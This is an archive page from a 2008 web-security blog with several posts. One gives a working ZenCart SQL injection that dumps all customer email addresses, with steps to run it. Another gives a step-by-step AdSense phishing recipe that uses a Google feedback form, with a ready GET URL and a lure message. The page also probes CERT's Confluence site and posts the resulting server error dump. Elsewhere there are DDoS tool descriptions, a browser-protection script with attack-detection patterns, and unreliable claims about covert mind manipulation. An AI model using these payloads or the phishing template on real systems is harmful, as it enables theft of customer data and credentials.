Web Security

Microsoft RDP.

Monday, November 10th, 2008 | Web Security | No Comments


source: OWASP News

ZenCart 1.3.8a SQL Injection

Friday, November 7th, 2008 | Web Security | No Comments

Unfortunately, an SQL injection vulnerability was discovered in ZenCart v1.3.8a.

To test it, follow these simple steps:

1. Go to the product listing page by clicking a category.

2. Save the page on your PC, open it in a text editor and modify the quantity input of a product (assuming there is a product with id 111, or whatever id is present) from

<input name="products_id[111]" size="4" type="text" value="0" />

to

<input name="products_id[-1' union select GROUP_CONCAT(customers_email_address), 2 from customers/*]" size="4" type="text" value="0" />

3. Submit the form by adding at least one product to the cart using the modified input box.

The result is that a comma-separated list of all customer email addresses is shown.

To protect against this attack, apply the following security patch:

http://www.zen-cart.com/forum/showthread.php?p=604473
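The check a defender wants here, as an added example that is not ZenCart's code or the forum patch linked above: the injection point in the steps is the array key of products_id[...], so every key is validated as a positive integer before it is used, and the product lookup binds the id as a query parameter. The form-body parser, the in-memory SQLite schema and the sample rows are constructed for this example.

```python
"""Hardened handling of ZenCart-style products_id[<id>] form fields.

Added example, not ZenCart's code or its official patch. The page shows the
array key of products_id[...] reaching the SQL query unsanitized; here each
key is whitelisted as a positive integer and the lookup is parameterized.
The form parser, schema and sample rows below are constructed for the demo.
"""
import re
import sqlite3
from urllib.parse import parse_qsl

# Shape of the field name in the ZenCart listing form: products_id[<key>]
FIELD_RE = re.compile(r"^products_id\[(.*)\]$", re.DOTALL)


def extract_product_ids(form_body: str) -> dict[int, int]:
    """Return {product_id: quantity} parsed from a URL-encoded form body.

    Raises ValueError for any products_id key that is not a positive integer
    (the injected key on the page contains a quote and SQL keywords, so it is
    refused before any query is built) and for non-numeric quantities.
    """
    result = {}
    for name, value in parse_qsl(form_body, keep_blank_values=True):
        m = FIELD_RE.match(name)
        if not m:
            continue
        raw_key = m.group(1)
        # Whitelist check: digits only, so no sign, quote or SQL fragment survives.
        if not raw_key.isdigit() or int(raw_key) <= 0:
            raise ValueError(f"rejected products_id key: {raw_key!r}")
        if not value.isdigit():
            raise ValueError(f"rejected quantity for product {raw_key}: {value!r}")
        result[int(raw_key)] = int(value)
    return result


def is_rejected(form_body: str) -> bool:
    """True when the form body contains a key or quantity the validator refuses."""
    try:
        extract_product_ids(form_body)
    except ValueError:
        return True
    return False


def build_demo_db() -> sqlite3.Connection:
    """Constructed in-memory schema standing in for ZenCart's products table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (products_id INTEGER PRIMARY KEY, products_price REAL);
        INSERT INTO products VALUES (111, 9.99), (112, 19.50);
        CREATE TABLE customers (customers_email_address TEXT);
        INSERT INTO customers VALUES ('alice@example.invalid'), ('bob@example.invalid');
        """
    )
    return conn


def lookup_cart_products(conn: sqlite3.Connection, form_body: str) -> list[tuple[int, float, int]]:
    """Validate the posted ids, then fetch each product with a bound parameter.

    Returns [(products_id, products_price, quantity), ...]. The id is already
    an int and is bound with '?', so posted text can never alter the statement.
    """
    rows = []
    for product_id, qty in extract_product_ids(form_body).items():
        cur = conn.execute(
            "SELECT products_id, products_price FROM products WHERE products_id = ?",
            (product_id,),
        )
        row = cur.fetchone()
        if row is not None:  # unknown ids are simply skipped, not errors
            rows.append((row[0], row[1], qty))
    return rows
```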


Covert Manipulation.

Friday, October 31st, 2008 | Web Security | No Comments

I've been interested in communication for a long time, and I am especially interested in the use of language for persuasion. Once you know how powerful words really are, you'll start using them with care. The conscious mind behaves in patterns, and those patterns can be broken. It's also possible to embed hidden commands inside language in order to trigger a response from someone. In fact, you can break the thought pattern of someone and replace it with yours. This can be easily proven. You read the words I typed here; they entered your mind in both a conscious and an unconscious way. I transferred my thoughts into your thoughts; unconsciously I might have given new instructions to change your feelings or ideas about something in a covert way. You are probably aware of this already, because certain words make you feel different than other words. Hacking the mind through covert manipulation is easier than you might have thought. Ask yourself: what impression did I give just now? What did I change that you weren't aware of before reading this text? Which thoughts are yours and which were mine? And how will they affect the rest of your day?

source: OWASP News

Oscommerce Sql Injection

Sunday, October 26th, 2008 | Web Security | 1 Comment

WARNING: Do not use any kind of information found here to harm websites, business, people lives etc…
The unauthorized usage of the aforementioned methods could lead to legal prosecution and severe penalties.

Ever wanted to check how an sql injection might work with an oscommerce store?


Secure Coding And Cocktail Parties.

Saturday, October 25th, 2008 | Web Security | No Comments

I am going to be very clear about this today. In the past I posted vulnerabilities in many websites, including websites from companies who say they secure web applications, or store web application vulnerabilities, and even those who give out certifications like (ISC)2, and I left out those who talk about application security while using insecure software packages to speak about it, because yeah, it's not their fault, is it? What does that say about them? Well, for starters it's the same thing as having a police officer commit a crime. It's about time for some introspective analysis for each and every one in the web application security field before this stuff gets further out of control. No wonder no one takes web application security and its experts seriously: look at the mess around you and your application security vendor who fails to secure himself. So when I see the secure coding group from CERT talk about secure coding standards [1], I get really disappointed when they are vulnerable themselves. It's not like we are dealing with a space mission to Mars, for example; it's just web application security, for fuck's sake! Something that can be explained to any 5th grader on four sheets of paper.

Judge for yourself, always useful to gain some extra SQL practice in real life:

https://www.securecoding.cert.org/confluence/dosearchsite.action?queryString=%22%3E&queryString=%22%3E&where=conf_all&type=&lastModified=&contributor=%22%3E&contributorUsername=

A system error has occurred - our apologies!

Please ask your Confluence administrator to create a support issue on Atlassian's support system at http://support.atlassian.com with the following information:

 1. a description of your problem and what you were doing at the time it occurred
 2. a copy of the error and system information found below
 3. a copy of the application logs (if possible).

Your Confluence administrator can use the support request form to create a support ticket which will include this information.

We will respond as promptly as possible.
Thank you!

Return to site homepage
Cause

java.lang.IllegalArgumentException: Invalid search query found in specified search. at com.atlassian.confluence.search.v2.lucene.LuceneSearchManager.search(LuceneSearchManager.java:74)

caused by: java.lang.IllegalArgumentException: org.apache.lucene.queryParser.ParseException: Cannot parse '">': Lexical error at line 1, column 3. Encountered: <EOF> after : "\">" at com.atlassian.confluence.search.v2.lucene.mapper.TextFieldQueryMapper.convertToLuceneQuery(TextFieldQueryMapper.java:46)

caused by: org.apache.lucene.queryParser.ParseException: Cannot parse '">': Lexical error at line 1, column 3. Encountered: <EOF> after : "\">" at org.apache.lucene.queryParser.QueryParser.parse(QueryParser.java:153)

Referer URL

Unknown
Confluence Application Information
Build Information

buildNumber: 1418
upTime: 2 days, 2 hours, 12 minutes, 11 seconds
devMode: false
version: 2.9.1
home: /var/lib/confluence
Unique ID: 0x0000011D5EDA2F53458D112A3234C9F2472F5C45C3AF54AE9C867DF600E1355
Server information

Application Server: Apache Tomcat/5.5.26
Servlet Version: 2.4
Database Dialect: com.atlassian.hibernate.dialect.MySQLDialect
Database Driver Name: com.mysql.jdbc.Driver
Database Driver Version: 5.0
Database Name: MySQL
Database Version: 4.1.22
Database Transaction Isolation: Repeatable read
Database Latency: 0
Memory Information

Total Memory: 1016 MB
Used Memory: 913 MB
Free Memory: 103 MB
System Information

userName: tomcat
favouriteColour: Sangria
time: 08:05:12
javaVm: Java HotSpot(TM) Client VM
operatingSystemArchitecture: i386
date: Friday, 24 Oct 2008
operatingSystem: Linux 2.6.9-78.0.1.ELsmp
jvmVersion: 1.0
userTimezone: US/Eastern
fileSystemEncoding: UTF-8
jvmImplementationVersion: 1.5.0_16-b02
appServer: Apache Tomcat
javaVendor: Sun Microsystems Inc.
javaVersion: 1.5.0_16
javaRuntime: Java(TM) 2 Runtime Environment, Standard Edition
jvmVendor: Sun Microsystems Inc.
Cluster Information

Not clustered.

Request Information

URL https://www.securecoding.cert.org/confluence/500page.jsp 
URI /confluence/500page.jsp 
Context Path /confluence
Servlet Path /500page.jsp
Query String queryString=%22%3E&queryString=%22%3E&where=conf_all&type=&lastModified=&contributor=%22%3E&contributorUsername=

Headers (Limited subset)

host www.securecoding.cert.org
user-agent Mozilla/1.0 (Windows; U; Windows NT 1.1; en-US; rv:2.9.0.3) Gecko/2002016217
keep-alive 300
connection keep-alive

Attributes

javax.servlet.forward.request_uri /confluence/dosearchsite.action
javax.servlet.forward.context_path /confluence
javax.servlet.forward.servlet_path /dosearchsite.action
javax.servlet.forward.path_info /500page.jsp
javax.servlet.forward.query_string queryString=%22%3E&queryString=%22%3E&where=conf_all&type=&lastModified=&contributor=%22%3E&contributorUsername=
javax.servlet.error.message
javax.servlet.error.exception java.lang.IllegalArgumentException: Invalid search query found in specified search.
os_securityfilter_already_filtered true
com.atlassian.johnson.filters.JohnsonFilter_already_filtered true
__sitemesh__using_stream false
javax.servlet.error.request_uri /confluence/dosearchsite.action
com.atlassian.gzipfilter.GzipFilter_already_filtered true
javax.servlet.error.status_code 500
__sitemesh__filterapplied true
javax.servlet.error.servlet_name action
webwork.valueStack com.opensymphony.xwork.util.OgnlValueStack@e2a5ac
Confluence-Request-Time 1224851735677
loginfilter.already.filtered true
atlassian.core.seraph.original.url /dosearchsite.action?queryString=%22%3E&queryString=%22%3E&where=conf_all&type=&lastModified=&contributor=%22%3E&contributorUsername=
javax.servlet.jsp.jspException java.lang.IllegalArgumentException: Invalid search query found in specified search.
sessioninview.FILTERED true

Parameters (Limited subset)

queryString "> ">
contributorUsername
type
where conf_all
lastModified
contributor ">

Confluence User

anonymous

^ Oops, besides this hideous blob of intelligence it also lets us modify the SQL query. Finally something really interesting to discuss at those cocktail parties, or is it?

[1] https://www.securecoding.cert.org/confluence/display/seccode/CERT+Secure+Coding+Standards
source: OWASP News

The RPC Worm Victim List.

Saturday, October 25th, 2008 | Web Security | No Comments

Opera Arioso Update.

Saturday, October 25th, 2008 | Web Security | No Comments

I've made some updates to my Opera plugin to block and protect against more attacks on Opera. Luckily there aren't that many attacks in comparison to other browsers; nonetheless I like to notice what happens on webpages I visit. The minor updates are based on Gareth Heyes' Unicode loop circumvention of Arioso's active heapspraying and buffer overflow detection, on setPreference, and on stricter opera: scheme blocking based on the new proofs of concept by Aviv Raff, Stefano Di Paola and Roberto Suggi Liverani. Arioso already protected against the proofs of concept on hyperlinks, but lacked additional heuristics on sources. Note that Arioso does not block JavaScript; instead it analyzes a document and its JavaScript and, based on attack heuristics, determines whether to block the scripts from executing before the page has a chance to load them. Arioso also detects attacks against Internet Explorer and Firefox; while these do not affect Opera, it's always nice to know that the page in question tries to execute an attack against you. One key feature of Arioso is the possibility of using Opera with a very strict same origin policy. This is and was enabled by default, and denies any cross-context sourcing of JavaScript files. This means that any script content loaded from another context than the one you are in will be blocked by default.

You can download the new version of Arioso here: http://www.0x000000.com/arioso.js

The Arioso source can be loaded into Opera. To enable user JavaScript, use Tools > Preferences > Advanced > Content > JavaScript options, and select the directory where you will put your User JavaScript files. Opera will load all files in the specified directory whose names end with .js and will use them as User JavaScript files. Use Opera with Arioso, and you'll be more secure than any other browser available right now.

(function(opera){

/*

 ~~~ Opera Arioso! ~~~
 Active browser vulnerability detection & protection by rvdh, 0x000000.com

 $revisions$
 update: 20/7/2008: 7:15 PM, keylog pattern adjusted.
 update: 22/10/2008: 23:00 PM, unicode loop detection.
 update: 23/10/2008: 4:19 PM, blocks opera:* on sources, blocks intranet access.
 credits: Rvdh, Gareth Heyes, Roberto Suggi Liverani, Aviv Raff, Stefano Di Paola

*/

// Arioso magic variables
window.opera.defineMagicVariable('arioso_links', function() {}, null);
window.opera.defineMagicVariable('arioso_alert', function() {}, null);

// Set strict same origin policy:
var arioso_strict_sop = true;

// Arioso variables
var arioso_links = document.links;
var arioso_alert = "";
var crlf = ". \r\n";

// Arioso messages
var m1 = 'Unsafe URI hyperlink schemes';
var m2 = 'Denial of service vector';
var m3 = 'Heapspraying or denial of service vector';
var m4 = 'VBInjection';
var m5 = 'Cookie stealing';
var m6 = 'Same origin policy violation';
var m7 = 'Keylogging';
var m8 = 'Script access';
var m9 = 'ActiveX access';
var m10 = 'Java access';
var m11 = 'Http response splitting';
var m12 = 'Preference hijacking';

// Arioso patterns
var p1 = /^(chrome|file|opera|res|data|telnet|about|resource|view-source|acrobat|localhost|loopback|127\.|192\.)\s*(:|\.)/gim;
var p2 = /for\s*\(\s*.*([a-z]|[0-9])\s*\=\s*.*([a-z]|[0-9])\s*;\s*.*([a-z]|[0-9])\s*(<|>|<=|>=|<==|>==)\s*[0-9]{3,}\s*;\s*/gim;
var p3 = /(while|for|space|block|memory).*unescape\(("|')(%[0-9]|\\x|\\u)([a-z]|[0-9])("|')\)/gim;
var p4 = /String\(\s*.*([a-z]|[0-9]){6,},\s*"[a-z]"\)/gim;
var p5 = /(http|https):\/\/.*\?.*=.*(\+|concat|join).*document\.(cookie|domain)/gim;
var p6 = /(src|href|location|data|classid|codebase|open)\s*(=|\().*(chrome|file|opera|res|data|telnet|about|resource|view-source|acrobat|localhost|loopback|127\.|192\.)\s*(:|\.)/gim;
var p7 = /(\.keyCode|\.keypress|(e|event)\.charCode)/gim;
var p8 = /(bad_arioso_schemes|arioso_links|arioso_schemes|arioso_sanitize_xss)/gim;
var p9 = /(ActiveXObject\(("|').*Shell("|')\)|HKEY\_)/gim;
var p10 = /(java\.(sun|awt)|packages\.(.*)(plugin|javascript))/gim;
var p11 = /open\(("|')\s*(GET|TRACE|POST)\s*("|').*(\\r|\\r\\n|\\n|(%[0-9]|\\x|\\u)([a-z]|[0-9])).*\)/gim;
var p12 = /.*opera\.setPreference.*/gim;

// strict same origin policy detection
if (arioso_strict_sop == true) {
  window.opera.addEventListener('BeforeExternalScript', function(e) {
    // Block any external script whose src does not match the current document location
    if (!e.element.getAttribute('src').match(document.location)) {
      e.preventDefault();
    }
  }, false);
}

// Arioso link enumerator detecting bad uri schemes
window.addEventListener('DOMContentLoaded', function(e) {
  for (var i = 0; i < arioso_links.length; i++) {
    var entity = arioso_links[i].toString();
    if (entity.match(p1)) { arioso_alert += m1; }
  }
}, false);

window.opera.addEventListener('BeforeScript', function(e) {

  // Inline script heuristics: each matching pattern appends its message and blocks the script
  var s = e.element.text;
  if (s.match(p2))  { arioso_alert += m2 + crlf;  e.preventDefault(); }
  if (s.match(p3))  { arioso_alert += m3 + crlf;  e.preventDefault(); }
  if (s.match(p4))  { arioso_alert += m4 + crlf;  e.preventDefault(); }
  if (s.match(p5))  { arioso_alert += m5 + crlf;  e.preventDefault(); }
  if (s.match(p6))  { arioso_alert += m6 + crlf;  e.preventDefault(); }
  if (s.match(p7))  { arioso_alert += m7 + crlf;  e.preventDefault(); }
  if (s.match(p8))  { arioso_alert += m8 + crlf;  e.preventDefault(); }
  if (s.match(p9))  { arioso_alert += m9 + crlf;  e.preventDefault(); }
  if (s.match(p10)) { arioso_alert += m10 + crlf; e.preventDefault(); }
  if (s.match(p11)) { arioso_alert += m11 + crlf; e.preventDefault(); }
  if (s.match(p12)) { arioso_alert += m12 + crlf; e.preventDefault(); }

}, false);

document.addEventListener('load', function(e) {

  // Show a fixed banner listing everything that was blocked on this page
  if (arioso_alert != '') {
    var ary = document.createElement('div');
    ary.style.position = 'fixed';
    ary.style.top = '0px';
    ary.style.left = '0px';
    ary.style.width = '100%';
    ary.style.opacity = '.90';
    ary.style.filter = 'alpha(opacity=90)';
    ary.style.border = '1px dotted #f30';
    ary.style.padding = '3px';
    ary.style.font = '8pt sans-serif';
    ary.style.backgroundColor = '#f00';
    ary.style.color = '#fff';
    ary.appendChild(document.createTextNode('ARIOSO BLOCKED: ' + arioso_alert));
    document.body.appendChild(ary);
  }

}, false);

})(window.opera);

source: OWASP News

Disable RPC.

Saturday, October 25th, 2008 | Web Security | No Comments

There is some fuss about RPC on Windows platforms. [1] As usual, I recommend temporarily disabling RPC from starting up when Windows boots. RPC is nasty, and yet again a severe flaw has been found that attackers can abuse to take over a remote PC, and it doesn't require user interaction. An attacker can just send an RPC request remotely and take over your PC, including but not limited to using it to spread worms. It's highly recommended that you temporarily turn RPC off if you haven't already done so. I wrote a small script that can do it for you in Internet Explorer, if you trust me of course! If you haven't got Internet Explorer, you can do it manually as well.

Save the script as HTML and run it from your desktop or intranet.

<script language="JavaScript">
// Start value 4 = Disabled (2 = Automatic, 3 = Manual); this is the key the post targets
var HKEY = "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\RpcSs\\Start";
function lockdownRPC() {
  try {
    var keylock = new ActiveXObject("WScript.Shell");   // only available in IE with ActiveX enabled
    keylock.RegWrite(HKEY, 0x00000004, "REG_DWORD");     // write Start as a DWORD, not a string
    alert('RPC start value set to: 0x00000004, Run > services.msc > RPC and change the startup type to manually or disabled.');
    keylock.Run("CMD /c services.msc");                  // open the Services console for the manual step
  } catch (e) {
    alert('Key could not be altered, do it manually please.');
  }
}
</script>

<input type="button" value="Turn off RPC" onclick="lockdownRPC()">

Be cautious when working with RPC: the above script disables RPC, which is something Windows normally does not allow. Some programs may stop working after a reboot, so it is advised to set RPC to Manual in services.msc after running the script that unlocks the registry. To roll back, just run the script again and re-enable RPC.
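As an added example (not the post's script), the same change done from an elevated PowerShell session, with the current Start value saved first so the rollback the post mentions is a real restore; the backup file path is constructed, and it uses CurrentControlSet rather than the post's ControlSet001, since that is the control set Windows actually boots.

```powershell
# Added example, not from the original post. Assumes an elevated PowerShell session.
$key    = 'HKLM:\SYSTEM\CurrentControlSet\Services\RpcSs'
$backup = Join-Path $env:TEMP 'RpcSs-Start.bak'   # constructed backup location

function Save-RpcStart {
    # Record the current Start value (2 = Automatic, 3 = Manual, 4 = Disabled)
    $current = (Get-ItemProperty -Path $key -Name Start).Start
    Set-Content -Path $backup -Value $current
    return $current
}

function Set-RpcStart([int]$Value) {
    # Refuse anything other than the three startup types that make sense here
    if ($Value -notin 2, 3, 4) { throw "Unsupported Start value: $Value" }
    Set-ItemProperty -Path $key -Name Start -Value $Value -Type DWord
}

function Restore-RpcStart {
    # Put back whatever Save-RpcStart recorded
    if (-not (Test-Path $backup)) { throw "No backup found at $backup" }
    $saved = [int](Get-Content -Path $backup)
    Set-RpcStart -Value $saved
    return $saved
}

# Back up, then apply Manual (3), the end state the post advises; the post's own
# script writes Disabled (4) instead.
$before = Save-RpcStart
Set-RpcStart -Value 3
$after = (Get-ItemProperty -Path $key -Name Start).Start
Write-Host "RpcSs Start was $before, now $after (backup in $backup)"
# Roll back later with: Restore-RpcStart
```

The change only takes effect at the next boot, so check `$after` and keep the backup file until you have rebooted and confirmed nothing broke.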

[1] http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
source: OWASP News

New and old DDOS Tools

Saturday, October 25th, 2008 | Web Security | No Comments

For sure this list is not intended for newbies who want to start a DDOS attack. It is meant to inform readers about the tools, new and old, that hackers use for their denial-of-service attacks. It's interesting to see how these tools have evolved and improved over time.

In roughly chronological order, here are the DDOS tools in use today:

Trinoo, or Trin00, appeared in 1999 and is a distributed SYN DoS attack tool.
The Tribe Flood Network (TFN) is able to implement attacks such as ICMP flood, SYN flood, UDP flood, and SMURF. Communication from the TFN client to the daemons is accomplished via ICMP ECHO REPLY packets. The absence of TCP and UDP traffic sometimes makes these packets difficult to detect, because many protocol monitoring tools are not even configured to capture and display ICMP traffic.
Stacheldraht is a combination of trinoo and TFN. Additionally, it encrypts master – attacker traffic, and the agents (the zombies – the computers from which the DDOS attack is launched) have the ability to auto-update.
Apache DDOS – it uses a vulnerability in Apache versions prior to 1.2.5 (a URL sent to an Apache web server containing thousands of forward slashes (“/”) would put the server into a state that consumed enormous CPU time).
Trinity. This distributed denial-of-service tool has the interesting feature that communication between the intruder and his agents/zombies is accomplished via Internet Relay Chat (IRC) or AOL’s ICQ, which makes it even harder to trace back.
Shaft DDoS, similar to trinoo, has the ability to configure the packet size and the duration of the attack.
Tribe Flood Network 2K (TFN2K) is a complex variant of the original TFN with features designed specifically to make TFN2K traffic difficult to recognize and filter, to remotely execute commands, to hide the true source of the attack using IP address spoofing, and to transport TFN2K traffic over multiple transport protocols including UDP, TCP, and ICMP. TFN2K attacks include flooding (as in TFN) and attacks designed to crash or destabilize systems by sending malformed or invalid packets, such as those found in the Teardrop and Land attacks.
SubSeven Defcon8 – while this is not a DDOS tool, it is a worm used to collect zombie computers. It can spread through websites (adult sites…), e-mail, etc.


Phishing With Google.

Sunday, October 19th, 2008 | Web Security | No Comments

I really feel Google should know better than this. Check out this form residing on the Google domain[1]. It allows phishers to use the Google e-mail interface to phish Google customers in a very simple way. Let's say we set up a Google Pages account, or some other domain, where we create a page that looks like the AdSense interface where customers can change their login credentials. We then use the Google e-mail interface to send an e-mail in Google's name and phish people into visiting this website, collecting the submitted credentials.

While this can be nasty, it doesn't stop there. I wonder what happens when Gmail's spam filter kicks in once someone starts spamming through this e-mail interface, and the filter starts blocking Google's own e-mail addresses because of the large volume of e-mail coming from their own domain? It is probably also possible to get someone's e-mail address blacklisted this way.

Moreover, the e-mail interface also accepts GET to submit the phishing e-mail:

http://services.google.com/feedback/adsensetour_email?
validate_form=yes&
FirstName=adsensecustomer&
Email=foobar%40gmail.com&
LastName=Sergey+Brin&
Company=security%40google.com&q_Answer=MESSAGE_HERE&
submit=Send+It

Message:

This is an important message to all our Adsense customers. Google needs to
verify your Adsense account, every year we require you to change your password in
order for your safety. You must change your password within 10 days or your account
will be suspended.

Follow this link to change your password:

http://googlepages.com/chgpass/	

[1] http://services.google.com/feedback/adsensetour_email?hl=
source: OWASP News